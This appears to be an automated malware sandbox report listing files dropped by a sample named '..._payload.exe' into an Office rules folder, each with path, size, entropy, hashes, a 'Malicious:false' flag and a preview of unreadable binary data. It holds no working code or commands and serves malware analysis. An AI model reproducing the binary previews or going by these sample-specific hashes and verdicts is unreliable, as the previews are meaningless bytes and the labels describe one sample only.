                                                                                                                                                                      SHA1:7AF76B618D751E663A2DA033FE41538A4589595B
                                                                                                                                                                      SHA-256:1AB32700D0D27551D0BBBFDB108E1C093EF77138AF730D4D9F53909FAC2CC9B6
                                                                                                                                                                      SHA-512:1A3755497387C0ACD139EC50C9221FCD947EA49F24637832422B1816F5E9DFAD153F31CB863A61ADEE646260526078E9D5D997F5569A1E8327EBF94D20B30C7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.0Y.Q.....F....U..'..!%.m..).G5.G.(.Bl.. .3..k!;.....>..mU......'.X.[..-`.......I....b.g`...gi.-f.HqV..C."S...M..A."+W(.......g..?.h.$.A.Ou.1.;.F.*..4.33\......Q...a..@g....cdx1..9U]Ag..D.........p0.R..!.L .C.......C.Y..y.xvD!@.6.......R;.....=....'J...B.;Cv..E.........#...P....R.W..k.#..L..Vh|`{.}8yUt...2....|v%. {...K..E?{...a..J..U..d\...p.B..2t...L.1..........{........K..|m3.gT...W..~s...#..O=Q.....F...\.X."S...Z..b..la._..|wo..R.z..oqs.$....z..f.....1........3[..c..6...P.D....L.&.*&7i..L.....:F..6. M.....?...0....p...9.>Iwv.^.S..).3.w.#fP.W-n.|.....{...)..{...#,3a.ox..,[....ND..l....)$q....S.~B8,.m..V.s..I...u.._...=..%.A.a.8g.dm.1[>.0w....c.._2......qmB/`.....=m...m.O.o.M..Q. .F.!3.e.88> ..R......|/..pUB.6C.z..{.{\.FJ....G..v..qq......$ESn.R...%......|.9.L.[.....)..x0|.D..3Df.K...G.....w.Z.V]..._.T.T...d$AW......zy.9T..........o.(.Ai4w..:._..)W...$Y....Eosi.8..ZjSL.)....[.h.T.6......Gj.\~.U.cl.r-.r...>.....+,......t.<..?.I.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                      Entropy (8bit):7.897174940677038
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:B+/tEqq7w8/EVDch+3GoHRTw3sJbc6RgvCqQYnapWD:nZsI8DcxctfJvgvClY9
                                                                                                                                                                      MD5:615F5BC64FFC2317E21C24CCEF9E4FA2
                                                                                                                                                                      SHA1:8D0DFFE27D40CAB9E0E825E47497C20ACD06D86D
                                                                                                                                                                      SHA-256:74E1314785FFACFC8E1E7D1C43379802FBB6D0518661A40BFFD1E2B9B832CE5D
                                                                                                                                                                      SHA-512:BB9D4A4BFD7E6E4BC55AADEA6664418F16D7A1E1B97A497A489B394E05C6DF2865236D975B9EB52F668663CE98B8D57B0C653F3293F8787D8C8AAD7252800739
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly..0*p.o/.{.....H..$z.v..NS>..k.X..R.w.......@ ^.......;...M......._.dO....W....b.]11...)U...FmY.3..q.5.....w|c...w..>/..<LW..}.EH........R1....#..1.KM1.=....P;.....zJ.X..:....[....R.;.~.<E.=.0.Z..d....u..l.;....$..........c...{.".1.l.C.'..+....0...s|..G.`I...lRxP[..X...1#.r....Y..-..=.7o....=..,....E2.ecr.y.........~.`.QH{...#3P.:K....bf...{.FO..z.n2.tM.f.vnI.;...fB.n..)$....^..u@.. ...0.6-WY....[.....\c....'.c.B\g!..B..J............V.,.-wX}k.7..B-!..u..~"..4.\.el9.C.....y.Pp.W.#w./\<r...D.i*...2;.-D.^'.../.2.w.3J..b=\.T[4...F...q.9...U.7....bn....5n;.."i.-z.q............r..(..|..D.t.OK|..T...s..q.{.=EC?....{...8.v?..h4.h......5y.,..(.A..W...`.|9.\^Y...Y..+h........X....7c.z8...p..8;....#_s...,...N...7.^...{5.M].t.....!./p%..FKL.kX....^.f...&M7.Bi.^.M. ...>.w..B.X./....n.z.......m...z..r.."%.2O....{......:+?.8.UQ........o._.......brr....~)..H..a.........'.4.....H....$$.Th. .eVY?.@.N.c%.O<.>.O.R.....WK...*.O(.Hm$..+..$Zl...2:.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.890662883901773
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:uPsVzvwUVeI20gvfHJm0iikxVNST4jOTDPN2/CMD:wqrBEhvEioNS8KTDl2/P
                                                                                                                                                                      MD5:596E4BDDFE583DBA65D16FB6E2CA3256
                                                                                                                                                                      SHA1:FDE7933EA5720F75F5E0B7A73E1FFA83EB8D2439
                                                                                                                                                                      SHA-256:4B40D9F7F21173170EC149A283EC8CD820FD9EF3767BCAE4AB473B9BE96F9CB8
                                                                                                                                                                      SHA-512:5467D1895680B1DE40F2FE80953F8FB1138F229E82ADA4C84E6203870E51322650518CFB740ACFA27C9B55D0F452F16F8EFE6E59B2453D3F80170EEBF86B2F6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...I&%.R"(..plK.....;|....4.N..d...6#.....*>3._7jB..J;<.z.p7.....Y...c.G.~Wl........R..C*....S.N.Y....C......D.J.7.B,./&..........I,xS.w..}x.I%yE'I.z.. Cl.s.f...........`.....z..........).h..r.@..O.j..U...v=^...[.4KR...2....Y`..7o.......yVAw.8..p..).l........N....A..X....H6% ...C.n.vK..|...v.d.A..:......G{W....WV.1[.r[.q.....U..I..._].<J..?... |)..%......hF49.f..|......f..T*...k#E..fE- >.r.$<!.e[.#.f.U9..q$...Y..!....+'.Y.....e.2..*}.aiy%B;..2..s......+...H.O...6...O...-..E...G{........B...>.wt.R..Ah.u_........>...@.......%H.^.!j=.....p.G(.<.!/......Hd...N.f....c..E=.WNK.H....S.t......DI..d(..m3.|..[.-ej.h....'.....8.....>.fnp^8Y...T.......k.E.G%.....K....8........w3.+....................J..T+{'h,..4n.M.'..W.-....J4R...9.,9..r11......*.+5"e....L.K`.H.......q(V.~...vm.6...l..P....k...`.....d.-.$..B...1!...L......Z*S.'.....F...J..3..Ql|,.i ..*.}m.*V.F..Q.....@.7.?W.d`..Ul.QM#Q....9o.l..ZO4.Eb.....V..G..Mya_X\..}L...|....S.q

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.891082153472937
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:d5E/O7Ezyy0TFg7td+7XxDpGpmh/CARE3D:bVA9eFgT+9FVCuEz
                                                                                                                                                                      MD5:8C0B58C33290E00CCDD9461B91B1C3A5
                                                                                                                                                                      SHA1:34FF98C3DA0050D2EF463086406BCFF3B993417A
                                                                                                                                                                      SHA-256:B47B6A4C8EA9012C3EEF12C3B6025145ED1196C2010D8BB85A21B818AF69CAA2
                                                                                                                                                                      SHA-512:92E2A3FA8F6F2749D2C13C84C1F82BC13E8948867AEAA124C911253CC46168407376CF9EE8769F15104677F4D500975C974530DC646F6D048AFF57F9DD671412
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..!Np...O,[~.((...e.O...y...._..zh..zm!\....V....J...0x8@...CYXy.......s....]-V......Fl.......I....-.Z?.x..a...\Sb...]..b.>.]/..8...tH.F ...,8?...n._0.d.U.....D........~`.{.r....-..b.}r....CG...)Q).....M....x..y.C.0v...}D......>V....F.LL.7..A.........}mb.p.l<..]E.x*YzR`.........Z8.5E......r...:..^m....|.....j.....*...aS....t."q..k.xY(Ho..!.D...6..b.;i.....9....X.K..y.Y..>..f1..Wc$....v...G.....C.......<..Q!.(....l..Cu]RO...rJ..*G.V....-.?6.......W..t....X8."H..........F...D..P.gW.."..W...p..4.L}.....Q......r...nf...i1..P.a".j....~-..7/R...m..2.F....|#N9...=Fe...bxM.......n...iwViS}8U.... ....<%k..~.........Jo.P..".)r.Q...S~..*3u5.wd.q..........OP"Ng./Z.9.1^S..|4Oo....f........... .w.,......f.....?....%.X..R......:..@...'.e.@r._..h..t..........><...9.&.PXn.\.L.P.Z.....Rgi...M...S$..(HV..i.=..D....(..e.V.'.wB[uy.... ...I..^.u..g6.....C...E..[1.z......+0...........c:..........H_H>y.t........u......2.....j...B:...&S.....,a..;

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.884246912067047
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6A5vYDp3/1/QxSRh2D8rnQALo5DyDvVreDC7myot9fH8M+6GB/EZvVmyitr++Rij:zg4xSzy8rnQAL++Dv4omxn8MMd+1bD
                                                                                                                                                                      MD5:12783D31C8C0FF35D7E22F811701E3BF
                                                                                                                                                                      SHA1:4F1C7EC1ABD5244F170526D95598A56FB4646137
                                                                                                                                                                      SHA-256:3242A36A6DCA7F244EDABF1F52FEE611A4769CFF86D55EF083A5DFF0F9926610
                                                                                                                                                                      SHA-512:21E5515E4280CE31347DF72A829243671374B219DFCE7FAD7FFDF667FB745FC88BAA1A5FF4ADF8EEB10B11C75D5BDE7B5D3824718663F907071A7C422E77353D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml[&).?e.mM.1.x...J.3...0..wy..S@.Z.C">-._(.s..4...-..........F..;..8-.....k...G5..7^...o~.7V.....9oe...4~....c`.,4.I$.3{Q...a;l....,.........v....A...........@re)Ak.R..HI..S..lr.....LaE....6..a.g.H...yn..SIZ....pW;...0b..;W9.8)t.F..[w...?...e.{.S.7.=..{...[.....f7..J^:....{a9Uo..a./(.<.9..8u......|..!......p.X..C.z.......u.Z...:>pS..3.j....".O.F......Fs.7Ya].....XY`.......v}.k:.....$.....wg'...U..v..c]o.....nW..P.2d.....^^r....#.&..B..1t..2)..e"}.......R...... .X_...O..\..7+.$.q.....$.ru./)V$...C.W.l....`%...,,.Y....a....@.Y..k.}L=.<..V*C...uj;#D.FU.Y.&...HB...(7....."....._..\.. 6.#r(F.:=J.....j......o+.~......Ch=&....(wS0.....("...S...^..V.0..`..6.k.p....4.D.F_.z;.'.s.s....gR*.,..........-.A.2...i....m.7.&m..[8.\o..y{?.>.^3.H.E!.~.b<..........Y.>.?....YX.U..9.=Q.3..v6....8.....mc.:".a.g..k>.Ig.m.#....mH>94../.FS.*D.C..l.I..Y..T..V.U..............9n.o............m.TD.d.D...._..5...j. .R....ST.b,>..s,Y.Y...E.mE......._..!.v.).*.}.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.871742411271331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:8Q59VibheaJLpJvQyzDTCUMtTDjYFvNVMyP8AfxD:PTilfpFQqDoDcFkAh
                                                                                                                                                                      MD5:68530CC03C3093D140DE6603EE109CCB
                                                                                                                                                                      SHA1:E9905196FA5628F3C53E7687C6B5E058EFE79D6F
                                                                                                                                                                      SHA-256:1D04F8215C214050329BD6421F67EDC14D38BCDF263980F8C2544D3A6C7B5BF0
                                                                                                                                                                      SHA-512:CFC3FCDE781342B7969BC05ABAADEC04228509B487A2097BCDBD81666AD0801EBEDA9BD8485536DCDC01A020B6ED5456EB53FEDF46F59DAC461A2E829926AD5B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml[..F...k~C>.n,..$.KF..^l..:.3.!.(3W.$.C..F.......gQ.......S..~.v~9U)..t....z....R......E`.s...6..M{.1y.p.....E.....U..@..3,]d./......m^9_Z..X.......?..E..@S..d._.....hsG....~.9V.<..+..h2.......~..#.|.k.t AK..<&.sRm...............W..."#.[4.g..s......P1.T...N.J:S@@.s.N.P?.w<.81..:w....,(n..../.........[....Rw..S..u>).......@A.|[.x<..a&...P.?..+....]h...._..7.......je1.4.9a.T+.}.........f!.Or...y...$l$.....j....w.{M`.(.C.1...'..\..iLic.?.)..`.+VN...p.bs...0\UUk..b.....e./+S<.h{n...7....g..BV....L.l..k.......\o.]....D..;..}.B...(.,..26.W&..O..0~.....S..&h(..0/...6.u7U...X195...;pCRJch...JcteA').[...?..I..]..h..v$.....w...>.).c.mR...S....c.x.\..eB...z..........nC1@h...}(.x...".(j......T#.e....{..S.T.m.h..~y&..Z.b$..f.v..K...x..8pRg..:.A6".....D.Y*.P...~..@.X.E....[....24.E.b.....`.Y.w.]e..t.y.%.s..`n..j[_g.1..tt....s.7Jd.....+......\.....y...p.vWn.Ht..Z._.5..@W..<.%.c.B..bY.....[..h.a.nf"...G=....}.&.Xj...h...k...W.j.....u.....1r.S_L.=5..l.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700301v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.903212730294062
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:0v07SDkJYayfprYCOIOTqwPgT3HwU3h7yVVzSVpKAvxD:0v07SDkGauHOTD4XdJ/D5
                                                                                                                                                                      MD5:657E95C94A45960C5688B232A4A17125
                                                                                                                                                                      SHA1:35389237BC96DCF4CD693883BBE02EB9FDB03657
                                                                                                                                                                      SHA-256:2563877DF352E6E12D391D20A1770AC27D15C4B33E2510050C4588B3292917BC
                                                                                                                                                                      SHA-512:1792FA1F82860421893B612B1E3C73FB873240D980EBFAE0ED05C2C168304C3D5EF38A7A515469A3BEB944E7B57319420BF10564C2158114A2942A5CDD2D1C55
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlH.....ATg...A.@Z{...$..c.-....'.z|.......@.!+..f...tB*Hp...kj%.pM.d.8XK..1..E...zs...Z..I.t...L./.u;...../&.Z....T..R.8.n.F>.hO..(qnp.QB.h4r.1.|..Z$...."..2t...."}....../;&.....e.b.H.k.x..'?..l.*}..b.A......>~.'.._DNO{.".C.>...1...q........-.B.Y.[........0Q...<=|...k.<.fX.[.%!..X..\..=.:b<.s..4_.[..lt?A.3..4r....8.?KN..%.+Yi...~{.'.0..z..Y1s._(...+v.<R. ..M.:..t.9D.K+!...N'......x.d2W..e..n..h%.D........,..tW.|g.T.....n,..H~.((.....P..z.^/.t.Mno.s.......h7`..v.L..>O}e..J.....kT^f5<P`2.>..rr.*..*Fb......2AWF .....y..!...+.@2.D..^\.ZS.J.bQ..j.bY...m.......i..8.`.u....']..I|D~Q!f3N..&>.J.Aa*.c..~.~.....X....!..t@|6.j.X...g..%...*a.......V..-X.b#.U<.9SnMp`........[Q..;..PI..G.._....@V..4.....fv..Z...I...R..x.q........TR..9g......t.]..h.nI}.X.7....#..s.....N?)R.O...._8.].K.s..^..../{b..._..*..`.G.pL...~..?...9..+.:',...E<e.~)?8..-...,........-:yP0...i]j..H@r. ..o.A.*.Qp..H.k.`#..R\.x.k.-9.$.{.\gw..c....R^.x....*.Y.w..~+VD...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700350v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.883401022456879
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tonttj8MpZ9evq2Dw3Unfu+PZpiGoobBBOw563BgP72QRXUyZ1YSErGWjblVE+8F:tVJvq2cA/PZpTooqZxW1KblZOD
                                                                                                                                                                      MD5:8AA146E4FFBA34746B7BC7133C4E5A46
                                                                                                                                                                      SHA1:91C1201198DB47582C7E8C58BD79E2F9AABED510
                                                                                                                                                                      SHA-256:C7316510804E47997147E2BF8C93EAD332C7487DB9F0F97AE6D6407D3600D51D
                                                                                                                                                                      SHA-512:BF707D8BFBF0E289A4567DD153CA6EFBEC824BEC0708F72C1DF711285F5089119B72DD8FB3176EFD39AFE980927F99A930F35A6219ADEC67AF0AF6BD4C79FB8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..\W../h..[.S.0.+.._TZ~D.q.......wo...hDY..u.J...E.|oH.a..3.*.n..? Q)S..~..c..>s..!<,F.....;.6>.K.}....M[....\........R^+..8....,].T.HJ.g.P.I.\.L.3.[...g._ `...r...X?...>Yy.W..\..M.).9.+.J.y..E..R......0O.]a..h..O$.....rK2h..Dw<O.E...d.lc8...Q.$^D.|..e]fg.....V:~....\.....=...f.t..*.q.[...KJ.!o.@R)M...R.p....].t.....w.N...m.h.(.HF.(.#...HRj....>..m.1.$.7..%...<).#n..~..]V%)...^V"ys.8+.T|..P...2A..Mn......`R{.k.Q&.......?...+..F...C.A..b.$r......Fm..c..?@^...'..?`.?,.....;@..r.LU...l....%.b.5e.8{...O.&..@..#.....(T..;.rH...9c\..V.Kf..;....yz._`!|.6.Ow.....Y..+....4../r-l&.....od.......5(x.[...2O/#...o....^.lLc. .1.H..Eg...5..%"F.;%_..X.z..h...k.m.[.y&..Ju......PU.$2.i.V.* .5.(.,....#Ad.o.>D.."........<`L.ZsP._c.H.6.U!=......#z.^.w.&...}.\.F<.Y.M..F...p..W.....GbR .G.... H........[....b\....>...qw#*=.h.......k.....$...V.Ntv.y......z.~,.'....z..N....b..^....:V..lh.vN..k...W.......H\.i...\....x....]v....-.hmW.d.bX|....t...%.6y......-J^.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700351v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.8827104592423325
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:WAswJUwPETs4CAt5aA+/DwBXYZRmLxy4gGLRD:XKw4uu58kBXYfcc4gGF
                                                                                                                                                                      MD5:CDA38D0B406B773887AF6E4C14F88B3C
                                                                                                                                                                      SHA1:FEB970FE6A4FF13AD9206E77E5E0F8A96002AA91
                                                                                                                                                                      SHA-256:6CFEF3690C3F6E9B353DE07703A74187CB422A706A92F9C2B87F263FDAFCEF73
                                                                                                                                                                      SHA-512:F2CA5F78A122AA1DB1D51E71A62F0C74A8379240FA5BDEDAF0EC564B3CA17BFDB1849E459086FFEFB8BE84EB1B26F5FE66290E23DF0AAD0B79522D8FEC87ADCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly.......>......p.X..(.....x...Q...d.[S..$.$.0C.H.w..X_W..-}?....c..A+P.BB.Y....Eu..z..;.1..|j.x...z@...B~..9+.&...b....w.@.....F.. Z}..|...L..&.....T..,Y....[.......tw.NB{-1....,..qt..}........9....................F.aCG..a..>_........".k.g.O..2.....u.p..l..../........+.9\D..c9v..J.L...3..6....o.).-|....\.w$}.S..&#....f..B..KP.".6.XF;v..g.s.I.o[`.s].0#..o.4.\...]..1@f.b.8'Ag&.4...c..._XJ.,X..o.D.1..A`.c."..V..7...OU.h....D.O.H.>.1% _E.......ua.k7{.......z&.=..l...BN.(.vHs..........tR.{.."HA..B.|....Gl.e3.......<.&.....}CG<CH..(..\..r...<.Q.vh......Y.S..)n..O..\../.Q.....)..c..&.eQ.].u~2c.y^..np(j...e......D..OoQjq.+..v;+......x.b..j..#.:h...P.~8+..U.7.N...+.OF...q.z<..<.2M.3....k+h.E....2..V..a..I..I.......c...G.$"b.L....h7.B....v..7..U&q'.\...40.Iq.d..v.`\....Ye.Y..9y_U.....mHosz..yE......Fd.m..O..!...".kl..u...xJ.b.K..&...y..~\..(.6.g..E..~.....&......Je.g..-..x..p.(..0.r.T.?.]l_5....Z.>C#...j|.G..z.p.n..s.%.6B...QS,.N..kz..b....x..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700400v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.896298428299369
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Osgq8xm0y+/XeDP+LNfSndkDgxLH7CXonmCRkHMZVRCAL/ZOZq0Hp5s/roj5Xtow:Osgq88+/BB6dkDgxLbCq0AjZsj59bD
                                                                                                                                                                      MD5:08CE705F60DD10AF3842AC3DA097DAF8
                                                                                                                                                                      SHA1:802733E0DBEB34E3B09000CC0CA9A295103F3B24
                                                                                                                                                                      SHA-256:F8ECBEDD07A700D6A19BFEFC6E9996D3CAA5400A3C830B4DB86E2F88D2A79424
                                                                                                                                                                      SHA-512:2BE5F9DBE15EE63FA86562FA613A6C781D31855A5E6C1B0311AB31464DD6C951287AB278DADA62EC09431D0F1AEF60EAA6100E267759DDA77079710392DDD002
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.......+.4.`....v.!..X.w_.k......2f...t%..o$....07... k&.-.|e./,.L.......2.....h..G.7..(...m(`....zzU\...w/........K...W......NX.Pf.....G{=%'.W.[B....s.L......G.....K4.w.UW..J5R..5.....U...k........sr.6v;.fD,.1...}...w@..."....m.Mi.V.N.c...........C.....mN...w...C....*.;...F..yg...N..cO.8K..$ov.s......z...$/>.j.#.._"....d...$.~s.........%xO._.1..?...A.H5.N.....h..?..s%\5...|.q.#7...S\.R..'..YU.:.x..^%.O./.B7O....z..Mf%.h...PH4.%....Cd...3R....-zb.tZ.Boy.c(....v..2....{..qz.Fcc.....z...lV.$>....>1@...).!..9..@.....<..`.{..K.XVb.:..dP....3*.q.c/.....l:..([....6..2$...... .@..:.....q.fs..W...,...uyg5......$s.....x.....7X[.D(v... ....p&...o.cF..."Q...V.)r.g.a....e..A....Q....w6.;.V...jxu...5.../....<%|0........].~>.....L>....q....y$.q.`.1..@...xd....K..k?..}...3..B...f..v.A.....J.F.7..>T.$..^6..D)......?.u.g...Cm....7rP...(.<.....%_u..-.Z......VK.9\%.1.Yz.zDow!G.1.!.V.X.p..S..\...\x$U..ne./K5.;...(j.2F.<..@g.b....-r.....)..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700401v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.888837239003854
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:jgNmhSMGevZd3hxTttk5eCRgxj3DE5ojj9X/PyzTuD:speRd3hx5+i3Q5on9X/qzS
                                                                                                                                                                      MD5:EE8195C4A801C47E0DD12FC2C3C3A661
                                                                                                                                                                      SHA1:8DD94AE6F3D2529D08C40B31FF37C2AB76980ACB
                                                                                                                                                                      SHA-256:93D86F41269803F753C598E5C9532E03ACDF2D7194576F6FD55BE8BC712C461F
                                                                                                                                                                      SHA-512:7F56D0AF7D0B396C7BD26F7DD56C316122057EA9D08242E70595FF01887B8AE6C9903A9AE9208B05ECDB5D7BC94E88277E8E9619D96B383358F29D80CEBCAFCB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...AaVjY.'..4.Mu.$...>.J/...>l....ncq{..7............6!....3.}.......kd\..g..C&N........Evr....c...;f.ax.p...a6H?t+9D.J.@..KA....%T.L'..3....m.....4F+.E....' !..FC[r.T...+U..d.....~....?c..o.1.iXLbX..2V#.q".....+....XC.b..Qq.D%........O. y...H..T....k/.`x-}.o..x.,J..0. F....1`....3... 3.T.m....J}.A.Ri..s)g1...C .0....B'..[.....5..%..q...KO<E_s$..vr0.....4<....C.O{..s..K..j.m.>....99..<#.....K."....Lg..|tV......HA.BG.V.+....J....2FE5].GE.H..v?..@$F...Fq.}..W|....x.......5..Vy-.-.CF...|E./.TZ.$n../.F....)B3.6.n.&q.B...mYUL.8G._..v!c..]..{.......u.o...l.v6I^.HH.HA.A.gy.....[..`.8.r.;./r.N.A.'./}d.~B&H%.C...;..eA.z.Chx..Y.........\.hh.6....K.3.Hpj..`....f.Z#.....n.....!....:........X...;/...t/.*.....a\hs..=..?u..9.A}........@..K..5.x%)!... ..:J.#......@.$..B.>.xQ....t.9..S{.."...).1N.LT..G/TN.X....>....m.TvbO.._.l.. ...;..(.G.U..+.D....D.>}.Tt[|*..|_..u.\..Kd.E.".=5...9u~.D.q....}.{..ok....+..A..s...%..E..?;....N.Li.b..R......A..k.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                      Entropy (8bit):7.878699228819381
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:vPCgUAuyWJu2zpZBWjREYluXb2OXJDuZ6uD:SgUAD/2zpZBYeYlmbBXJiZ6W
                                                                                                                                                                      MD5:35F8EE730CC65004D9A37EB5745DBB05
                                                                                                                                                                      SHA1:5E6873BC3D65EFDAA1E8C860BD0C512D0E1736E5
                                                                                                                                                                      SHA-256:AB0323C078EC6BBC68E6DE212EAA8D392513ED7E575641B228C7D6FDF97A739A
                                                                                                                                                                      SHA-512:41187AF915AA6A3AE3454A008FACC0C807CA8BDB3ED61088F1A1256CB476BC796C7D2DD05FF2E9C3D07F30915687260B8AD2988503F3CA9148377E3CC004360A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.... U1..?H(.8......b..q.k.Z..!Y8...V..H&.C\....1...i;.q.....:$`.....O..0.fD.N.Z....5.<d.!..fVn...w.....8.....o..6....Z....B.d..Se[.6........vk<J..@3]5....n..........`......V..y...\.>.u..Z...y+....*;"K2H]..,(A.1:...R...a....|...e......f.x....t......,N.m..~,.>.-.k.@..Wv)}g.=F.{'.`...........?T.g..a}.H.S+5,6........^.X:r.w.J/wd.....!a.F....K...?....t.........y.3....m.=...I....aj...-R.a%...P..e&.j.G5..3.:y ...3...."xcY"...;).C>...]\..:w...S>.L..!...v.....`.N...1=.o.R.D.H....z.;.+.-....h.....~;...;.#7C.r!...6........Z.1...L.!.. .....3~...D>...&@.....Cd.5...P.....V........H$*....1K.r...+....3.g..q....wI?.Q..8..E..`.Q=)*[..>....\.KJ....z...C..R4a5y.UF....jBq..p.B.`$!...b.n...#.-...hj..%....>.)y.. ....fu.Y..7..1.........PR..gN.q.h....<;. `83.m...,k.q.n.g.....2.1.@'EO.,..m..<..z.....3.0..9..._.{sup....uP.k..aCGUn..Nn...&....//.G3..$...Uh.u.IK+.....rK6|z<....uQ...4.a...Ttz.<...y......=.T.>..b......5.2}.C.........0..QS.o..JcP..1[4?

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.876513765447361
                                                                                                                                                                      Encrypted:false
